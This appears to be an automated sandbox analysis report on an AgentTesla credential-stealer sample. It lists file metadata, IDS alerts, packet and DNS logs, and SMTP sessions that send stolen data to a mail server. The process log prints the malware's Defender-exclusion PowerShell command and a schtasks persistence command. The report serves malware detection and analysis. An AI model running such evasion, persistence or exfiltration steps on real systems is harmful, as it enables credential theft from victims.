                                                                    .text0x20000x74c300x74e00False0.895134943182data7.82200037315IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x780000x40d00x4200False0.178562973485data3.48705835154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x7e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x781900x468GLS_BINARY_LSB_FIRST
                                                                    RT_ICON0x785f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294577920, next used block 4294577920
                                                                    RT_ICON0x796a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294577920, next used block 4277800704
                                                                    RT_GROUP_ICON0x7bc480x30data
                                                                    RT_VERSION0x7bc780x26cdata
                                                                    RT_MANIFEST0x7bee40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyright
                                                                    Assembly Version0.0.0.0
                                                                    InternalNameIdentifierAuthori.exe
                                                                    FileVersion0.0.0.0
                                                                    ProductVersion0.0.0.0
                                                                    FileDescription
                                                                    OriginalFilenameIdentifierAuthori.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    12/02/21-16:41:04.503070TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49803587192.168.2.4198.54.126.165
                                                                    12/02/21-16:41:07.276201TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49804587192.168.2.4198.54.126.165

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 2, 2021 16:41:03.094677925 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:03.260797977 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:03.260974884 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:03.471905947 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:03.472251892 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:03.638493061 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:03.639396906 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:03.806386948 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:03.806868076 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:03.989881992 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:03.997076035 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.163391113 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.163904905 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.334196091 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.335347891 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.501511097 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.501540899 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.503070116 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.503294945 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.504085064 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.504228115 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:04.669442892 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.670600891 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.684218884 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:04.728302956 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:05.720310926 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:05.887752056 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:05.891658068 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:05.891877890 CET49803587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:05.893279076 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.058933020 CET58749803198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.060275078 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.063221931 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.232799053 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.232995033 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.399544954 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.399791002 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.569741011 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.596616030 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.770803928 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.771226883 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:06.938000917 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:06.938230991 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.107525110 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.107837915 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.274607897 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.274637938 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.276079893 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276201010 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276320934 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276416063 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276582956 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276668072 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276741982 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276828051 CET49804587192.168.2.4198.54.126.165
                                                                    Dec 2, 2021 16:41:07.442828894 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442862988 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442878008 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442894936 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.454941988 CET58749804198.54.126.165192.168.2.4
                                                                    Dec 2, 2021 16:41:07.509731054 CET49804587192.168.2.4198.54.126.165

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 2, 2021 16:41:03.027568102 CET5662753192.168.2.48.8.8.8
                                                                    Dec 2, 2021 16:41:03.061382055 CET53566278.8.8.8192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Dec 2, 2021 16:41:03.027568102 CET192.168.2.48.8.8.80x3ee6Standard query (0)server126.web-hosting.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Dec 2, 2021 16:41:03.061382055 CET8.8.8.8192.168.2.40x3ee6No error (0)server126.web-hosting.com198.54.126.165A (IP address)IN (0x0001)

                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Dec 2, 2021 16:41:03.471905947 CET58749803198.54.126.165192.168.2.4220-server126.web-hosting.com ESMTP Exim 4.94.2 #2 Thu, 02 Dec 2021 10:41:03 -0500
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Dec 2, 2021 16:41:03.472251892 CET49803587192.168.2.4198.54.126.165EHLO 980108
                                                                    Dec 2, 2021 16:41:03.638493061 CET58749803198.54.126.165192.168.2.4250-server126.web-hosting.com Hello 980108 [84.17.52.65]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPE_CONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    Dec 2, 2021 16:41:03.639396906 CET49803587192.168.2.4198.54.126.165AUTH login bWlsbGlAZW1yZW1ldGFsLnh5eg==
                                                                    Dec 2, 2021 16:41:03.806386948 CET58749803198.54.126.165192.168.2.4334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:41:03.989881992 CET58749803198.54.126.165192.168.2.4235 Authentication succeeded
                                                                    Dec 2, 2021 16:41:03.997076035 CET49803587192.168.2.4198.54.126.165MAIL FROM:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:04.163391113 CET58749803198.54.126.165192.168.2.4250 OK
                                                                    Dec 2, 2021 16:41:04.163904905 CET49803587192.168.2.4198.54.126.165RCPT TO:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:04.334196091 CET58749803198.54.126.165192.168.2.4250 Accepted
                                                                    Dec 2, 2021 16:41:04.335347891 CET49803587192.168.2.4198.54.126.165DATA
                                                                    Dec 2, 2021 16:41:04.501540899 CET58749803198.54.126.165192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                    Dec 2, 2021 16:41:04.504228115 CET49803587192.168.2.4198.54.126.165.
                                                                    Dec 2, 2021 16:41:04.684218884 CET58749803198.54.126.165192.168.2.4250 OK id=1msoCm-00D3As-DW
                                                                    Dec 2, 2021 16:41:05.720310926 CET49803587192.168.2.4198.54.126.165QUIT
                                                                    Dec 2, 2021 16:41:05.887752056 CET58749803198.54.126.165192.168.2.4221 server126.web-hosting.com closing connection
                                                                    Dec 2, 2021 16:41:06.232799053 CET58749804198.54.126.165192.168.2.4220-server126.web-hosting.com ESMTP Exim 4.94.2 #2 Thu, 02 Dec 2021 10:41:06 -0500
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Dec 2, 2021 16:41:06.232995033 CET49804587192.168.2.4198.54.126.165EHLO 980108
                                                                    Dec 2, 2021 16:41:06.399544954 CET58749804198.54.126.165192.168.2.4250-server126.web-hosting.com Hello 980108 [84.17.52.65]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPE_CONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    Dec 2, 2021 16:41:06.399791002 CET49804587192.168.2.4198.54.126.165AUTH login bWlsbGlAZW1yZW1ldGFsLnh5eg==
                                                                    Dec 2, 2021 16:41:06.569741011 CET58749804198.54.126.165192.168.2.4334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:41:06.770803928 CET58749804198.54.126.165192.168.2.4235 Authentication succeeded
                                                                    Dec 2, 2021 16:41:06.771226883 CET49804587192.168.2.4198.54.126.165MAIL FROM:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:06.938000917 CET58749804198.54.126.165192.168.2.4250 OK
                                                                    Dec 2, 2021 16:41:06.938230991 CET49804587192.168.2.4198.54.126.165RCPT TO:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:07.107525110 CET58749804198.54.126.165192.168.2.4250 Accepted
                                                                    Dec 2, 2021 16:41:07.107837915 CET49804587192.168.2.4198.54.126.165DATA
                                                                    Dec 2, 2021 16:41:07.274637938 CET58749804198.54.126.165192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                    Dec 2, 2021 16:41:07.276828051 CET49804587192.168.2.4198.54.126.165.
                                                                    Dec 2, 2021 16:41:07.454941988 CET58749804198.54.126.165192.168.2.4250 OK id=1msoCp-00D3EG-6C

                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:16:39:17
                                                                    Start date:02/12/2021
                                                                    Path:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:496640 bytes
                                                                    MD5 hash:80CEC5A926B23B289405700083013293
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:16:39:20
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                                                                    Imagebase:0xdf0000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:39:21
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:39:21
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                                                                    Imagebase:0xa40000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:39:23
                                                                    Start date:02/12/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:39:24
                                                                    Start date:02/12/2021
                                                                    Path:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Imagebase:0x700000
                                                                    File size:496640 bytes
                                                                    MD5 hash:80CEC5A926B23B289405700083013293
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >